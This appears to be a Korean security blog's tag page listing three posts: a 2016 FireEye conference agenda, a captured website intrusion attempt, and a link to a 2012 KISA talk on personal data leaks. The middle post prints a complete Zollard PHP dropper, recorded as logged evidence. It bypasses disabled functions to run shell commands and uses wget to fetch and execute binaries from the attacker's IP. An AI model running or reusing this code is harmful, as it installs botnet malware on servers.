'대응'에 해당되는 글 3건

  1. 2016.03.29 FireEye Cyber Defense Live 2016
  2. 2014.03.07 웹사이트 침해시도 탐지코드
  3. 2012.08.07 국내 개인정보 유출 대응현황과 시사점
2016.03.29 12:44

FireEye Cyber Defense Live 2016

TimeAgenda
08:30 - 09:30등록
09:30 - 09:45Welcome Speech - 전수홍 지사장, FireEye Korea
09:45 - 10:35[Keynote] Good enough is NOT good enough. 우리가 현재 직면하고 있는 위협의 실태 
- Grady Summers CTO, FireEye
10:35 - 10:50휴식 및 전시부스 관람
10:50 - 11:30Why Intelligence led security in integrated platform? 
- Wias Issa, Senior Director, FireEye
11:30 - 12:00[Customer Presentation] 국내 주요 증권사의 파이어아이 솔루션 적용 사례
12:00 - 13:00점심식사
 진단 & 준비탐지 & 방어분석 & 대응
13:00 - 13:40지금 이순간 우리조직의 건강상태는?파이어아이 차세대 악성코드 탐지를 위한 전략 및 로드맵침해사고대응 - 현장에 답이 있다!
13:40 - 14:20위협 인텔리전스 어떻게 활용할 것인가? 확률적으로 이기는 보안운영익스플로잇 공격의 최후 방어선 엔드포인트Why 네트워크 포렌식인가? YOU CAN’T STOP WHAT YOU CAN’T SEE!!!
14:20 - 14:40Coffee Break 및 부스 관람
14:40 - 15:20왜 공격자는 중소기업들을 공격 목표로 삼을까? 
- 모든 보안 투자의 최우선 순위는 APT 방어입니다.
랜섬웨어: How to NOT become a victim침해사고 조사 : 나무가 아닌 숲을 보아야 합니다.
15:20 - 16:00Red Teaming: Evolving the Penetration Test귀사의 보안은 변화하는 어플리케이션에 대해 고려하고 계십니까?파일 전수 검사를 통한 악성 코드 클린존 구축
16:00 - 16:40FireEye 연동 기반의 보안성 강화 방안Pervasive 가시성 확보를 위한 보안 전달 플랫폼 (Security Delivery Platform) 구축SSL 사용 환경에서의 어플리케이션 보호를 위한 보안장비 가시성 확보 방안
16:40 - 16:50휴식 및 전시부스 관람
16:50 - 17:20FireEye 플랫폼 전략
17:20 - 17:30맺음말 및 경품추첨

* 위 아젠다는 FireEye와 후원사 사정으로 변경될 수 있습니다.



사전등록 : http://fireeyeday.com/1604/


Trackback 0 Comment 0
2014.03.07 17:33

웹사이트 침해시도 탐지코드

아이피 : 65.185.5.104

organization:Class-Name:organization

organization:ID:NETBLK-ISRR-65.185.0.0-17

organization:Auth-Area:65.185.0.0/17

organization:Org-Name:Road Runner

organization:Tech-Contact:ipaddreg@rr.com

organization:Street-Address:13820 Sunrise Valley Drive

organization:City:Herndon

organization:State:VA

organization:Postal-Code:20171

organization:Country-Code:US

organization:Phone:703-345-3151

organization:Updated:2014-03-06 10:40:50

organization:Created:2014-03-06 10:40:50

organization:Admin-Contact:IPADD-ARIN


탐지코드:

<?php

echo "Zollard";

$disablefunc = @ini_get("disable_functions");

if (!empty($disablefunc))

{

 $disablefunc = str_replace(" ","",$disablefunc);

 $disablefunc = explode(",",$disablefunc);

}

function myshellexec($cmd)

{

 global $disablefunc;

 $result = "";

 if (!empty($cmd))

 {

  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}

  elseif (($result = `$cmd`) !== FALSE) {}

  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

  elseif (is_resource($fp = popen($cmd,"r")))

  {

   $result = "";

   while(!feof($fp)) {$result .= fread($fp,1024);}

   pclose($fp);

  }

 }

 return $result;

}

myshellexec("rm -rf /tmp/armeabi;wget -P /tmp http://65.185.5.104:58455/armeabi;chmod +x /tmp/armeabi");

myshellexec("rm -rf /tmp/arm;wget -P /tmp http://65.185.5.104:58455/arm;chmod +x /tmp/arm");

myshellexec("rm -rf /tmp/ppc;wget -P /tmp http://65.185.5.104:58455/ppc;chmod +x /tmp/ppc");

myshellexec("rm -rf /tmp/mips;wget -P /tmp http://65.185.5.104:58455/mips;chmod +x /tmp/mips");

myshellexec("rm -rf /tmp/mipsel;wget -P /tmp http://65.185.5.104:58455/mipsel;chmod +x /tmp/mipsel");

myshellexec("rm -rf /tmp/x86;wget -P /tmp http://65.185.5.104:58455/x86;chmod +x /tmp/x86");

myshellexec("rm -rf /tmp/nodes;wget -P /tmp http://65.185.5.104:58455/nodes;chmod +x /tmp/nodes");

myshellexec("rm -rf /tmp/sig;wget -P /tmp http://65.185.5.104:58455/sig;chmod +x /tmp/sig");

myshellexec("/tmp/armeabi;/tmp/arm;/tmp/ppc;/tmp/mips;/tmp/mipsel;/tmp/x86;");

?>



Trackback 0 Comment 0
2012.08.07 18:41

국내 개인정보 유출 대응현황과 시사점

 

B-1-3.pdf



국내 개인정보 유출 대응현황과 시사점

KISA 정연수 단장


Trackback 0 Comment 0